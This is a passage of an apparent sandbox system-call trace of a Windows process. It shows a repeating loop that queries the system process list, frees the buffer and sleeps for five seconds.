[0145.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.833] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.849] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.867] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.880] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.880] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.898] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.933] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.942] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.959] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.973] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.990] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.004] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.023] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.035] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.051] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.068] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.085] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.118] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.130] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.145] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.161] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.181] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.191] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, 